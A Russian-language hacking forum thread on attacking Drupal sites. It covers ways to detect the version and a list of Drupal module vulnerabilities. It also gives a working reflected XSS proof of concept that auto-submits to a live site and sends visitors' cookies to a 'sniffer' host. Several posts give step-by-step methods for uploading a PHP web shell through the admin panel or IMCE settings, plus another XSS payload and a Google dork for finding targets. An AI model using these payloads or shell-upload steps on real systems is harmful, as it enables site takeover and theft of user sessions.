|
узнаем версию
http://path/CHANGELOG.txt |
отсортировано по убыванию по дате =================== HIGH Drupal Meta Tags Module command execution Обход ограничений безопасности в Drupal Удаленный пользователь может изменить данные профиля других пользователей. Drupal Site_Documentation_Module CVE-2008-2271 Drupal Comment Upload Module =================== SQL-inj SQL-инъекция в Drupal SQL-инъекция в vbDrupal SQL-инъекция в Drupal Acidfree Module SQL-инъекция в Drupal Extended Tracker SQL-инъекция в Drupal Easylinks SQL-инъекция в Drupal Bibliography SQL-инъекция в Drupal Jobsearch SQL-инъекция и раскрытии е данных в Drupal =================== Multy Множественные уязвимости в vbDrupal Множественные уязвимости в Drupal Множественные уязвимости в Drupal Множественные уязвимости в Drupal Множественные уязвимости в Drupal Несколько уязвимостей в Drupal Несколько уязвимостей в Drupal Help Tip Несколько уязвимостей в Drupal IMCE =================== CSRF CSRF атака в Drupal Userpoints Module CSRF атака в Drupal BUEditor Module =================== XSS XSS Drupal Internationalization and Localizer XSS Drupal E-Publish Module XSS Drupal Ubercart Module XSS Drupal Webform Module XSS Drupal Flickr Module XSS Multiple Time Sheets XSS Drupal XSS Drupal Workflow Module XSS Drupal Archive Module XSS Drupal Shoutbox Module XSS Drupal Token XSS Drupal Web Links XSS Drupal Project Issue Tracking Module XSS Drupal XSS Drupal LoginToboggan Module XSS Drupal Project Module XSS Drupal MySite Module XSS Drupal Site Profile Directory XSS Drupal Search Keywords XSS Drupal Pathauto XSS Drupal E-commerce XSS Drupal Easylinks XSS Drupal Bibliography XSS Drupal Recipe Module XSS Drupal XSS Drupal webform Module XSS Drupal XSS Drupal =================== Module Drupal Simple Access Module Drupal Header Image Module Уязвимость позволяеть получить доступ к административной части приложения. Drupal Secure Site Module Злоумышленник, использующий тот же прокси сервер, что и целевой пользователь, может получить доступ с привилегиями целевого пользователя. Drupal OpenID Module Злоумышленник может установить злонамеренный OpenID провайдер и произвести спуфинг атаку. Drupal Forward Module Удаленный пользователь может с помощью специально сформированного URL получить доступ к запрещенным сообщениям в приложении. Drupal Print Module Удаленный пользователь может с помощью специально сформированного URL получить доступ к запрещенным сообщениям. Drupal Project Issue Tracking Module Уязвимость заключается в том, что авторизованный пользователь может просмотреть сообщения, даже если они помечены как частные. Drupal Nodefamily Module Уязвимость позволяет удаленному пользователю просмотреть и изменить данные в профиле пользователей путем изменения некоторых аргументов в URL. Drupal Textimage Module Удаленный пользователь может обойти защиту captcha путем изменения некоторых переменных в запросе. Drupal Captcha Module Удаленный пользователь может с помощью специально сформированного запроса обойти проверку captcha. Drupal Pubcookie Module Уязвимость существует из-за недостаточной проверки данных в файле pubcookie.module. Удаленный пользователь может обойти процесс аутентификации. Drupal Form_mail Module Удаленный пользователь может с помощью символа новой строки внедрить произвольные заголовки в email сообщение. |
вот так версию узнать можно:
Смотрим файл: http://www.site.ru/modules/system/system.module ... Там есть строчка: define('VERSION', 'ТУТ ВЕРСИЯ'); Если строчки нет, то версия ниже 4.7.0 Дополню пост: в некоторых модулях написана версия, к примеру: site.ru/modules/aggregator/aggregator.info там прямо смотрим строчку version и всё. З.Ы. почему бы не прикрепить тему, тоже нужная вещь |
PoC:
<HTML> <TITLE>Drupal reflected XSS by ettee(itdefence.ru)</TITLE><!-- Full HTML =on "">><<script>img = new Image(); img.src = "http://sniffer/image/s.gif?"+document.cookie;</script> --><BODY onload="p.submit()"> <form action="http://freelanguage.org/comment/reply/532/1263"<!--target-- > method="post" id="p"> <input type=hidden name="subject" value="aaaaaaaaaaaaaaaaaaaaa"> <input type=hidden name="comment" value='"">><<script>alert(document. cookie)</script>'> <input type=hidden name="format" value="3"> <input type=hidden name="form_id" value="comment_form"> <input type=hidden name="op" value='Preview comment'> </form> </BODY> </HTML> Google dork: powered by "drupal"; intitle:"powered by drupal" |
Drupal 6.14 - заливка шелла из админпанели
1) Administer->Site building->Активируем Upload "Allows users to upload and attach files to content" (по умолчанию выключено)->Save configuration 2) Administer->Site configuration->File uploads->Добавляем расширение php3 в список разрешенных 3) Create content->Page->создаем и сохраняем страницу (снимаем галочку с Published) 4) Administer->Content management->Edit только что созданную страницу->File attachments->Загружаем шелл с расширением .php3 (если просто .php - в конец автоматически добавляется .txt) 5) http://drupal.ru/sites/default/files/shell.php3 - шелл 6) Administer->Content management->Удаляем страницу |
мои 5 копеек, по файлу robots.txt можно определить версию движка, там есть такая строчка
Код:
# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $ |
ещё один способ загрузки шела
ещё один способ загрузки шела:
Site configuration - IMCE settings выбераем категорию пользователей - в графе Non-image file support: добавляем .php Затем идем сюда Profile - Personal files грузим шелл и он загрузиться в папку files/папка_пользователя/шелл.пхп |
Drupal 7.0 Shell Execution Script
PHP код:
|
Drupal 5.x, возможно более ранние версии.
Уязвим параметр profile_big, field_location[0][city]. POST: Код:
www.site.ru/user/ID_пользователя/edit/О себе?form_build_id=&form_token=&form_id=&profile_=test&profile_big=alert('XSS by mr.Penguin')&op=СохранитьСкриншоты: http://s019.radikal.ru/i628/1203/0b/baae855e8a70t.jpg http://s019.radikal.ru/i600/1203/d4/cff18d1d4188t.jpg |
| Время: 14:11 |